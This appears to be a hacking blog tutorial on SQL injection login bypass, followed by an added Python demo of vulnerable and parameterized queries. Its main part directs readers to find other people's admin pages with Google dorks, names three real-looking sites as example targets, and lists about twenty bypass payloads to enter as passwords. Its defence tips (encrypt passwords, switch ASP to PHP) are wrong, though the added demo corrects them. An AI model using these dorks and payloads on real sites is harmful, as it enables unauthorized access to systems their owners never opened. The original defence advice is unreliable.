SQL INJECTION WEBSITE HACKING, Secugenuis
Today I bring you another hacking trick/method: SQL injection.
What do we understand by SQL injection?
Injecting SQL queries into another site's database, or using crafted queries to bypass authentication as an admin.
Part 1
Basic SQL injection: gaining authentication bypass on an admin account. Most sites vulnerable to this are .asp, so first we need to find a site. Start by opening Google and typing a dork (definition of dork: a search entry for a certain type of site/exploit).
There are a large number of Google dorks for basic SQL injection.
Here are the best:
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
Examples are listed below; make sure the URL looks like this:
http://www.casualtyprotection.com/login-admin.asp
http://login.fanhow.com/login-admin.asp
http://www.normatech.it/login-admin.asp
Now, what to do once we get to our site. The site should look something like this:
Welcome to xxxxxxxxxx administrator panel
Username :
Password :
So what we do here is: in the USERNAME field we always type "Admin", and for our PASSWORD we type our SQL injection.
Here is a list of SQL injections:
' or '1'='1
' or 'x'='x
' or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
TYPE ANY ONE OF THESE IN THE PASSWORD FIELD... There are many more, but these are the best ones that I know.
What this SQL injection is doing:
Making the WHERE clause of the login query always true, so the database returns a match whatever the real password is and you get an authentication bypass. So your input should look like this:
username: Admin
password: 'or'1'='1
So click submit and you're in. Wow.
NOTE: not all sites are vulnerable.
HOW TO SECURE YOUR SITE FROM THIS ATTACK
1- Put encryption on the passwords.
2- Change the platform of your website from ASP to PHP.
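To show concretely why the payloads above log you in and what actually stops them, here is an added example (my own code, not from the original post) in Python with an in-memory SQLite database: a login that concatenates user input into the query beside one that binds it as parameters. The table, the account name "Admin" and the password value are constructed for the demo.

```python
import sqlite3

# Constructed demo data: an in-memory table with a single admin account.
DEMO_PASSWORD = "correct-horse-battery-staple"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("Admin", DEMO_PASSWORD))
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Builds the login query by string concatenation, the pattern the
    page's payloads exploit: the quote in the payload ends the string
    literal and the rest becomes part of the WHERE clause."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver sends the input as a
    value, so quotes, OR and -- inside it are compared as plain text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def demo():
    """Runs both logins with the real password and with two payloads
    from the page's list; returns the outcomes keyed by case."""
    conn = make_db()
    cases = {
        "real": DEMO_PASSWORD,
        "quote_or": "' or '1'='1",   # makes the WHERE clause always true
        "comment": "' or 1=1--",     # -- comments out the trailing quote
    }
    results = {}
    for name, pw in cases.items():
        results["vuln_" + name] = login_vulnerable(conn, "Admin", pw)
        results["param_" + name] = login_parameterized(conn, "Admin", pw)
    return results

if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:15s} -> {'logged in' if ok else 'rejected'}")
```

Storing a hash instead of the plaintext password does not change the vulnerable function's result, because the injected OR clause is true whatever the stored value is. Binding parameters (prepared statements) is the fix that works on ASP and PHP alike.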
Disclaimer
::: I am using this as a tutorial for educational purposes and not for crime... So be careful.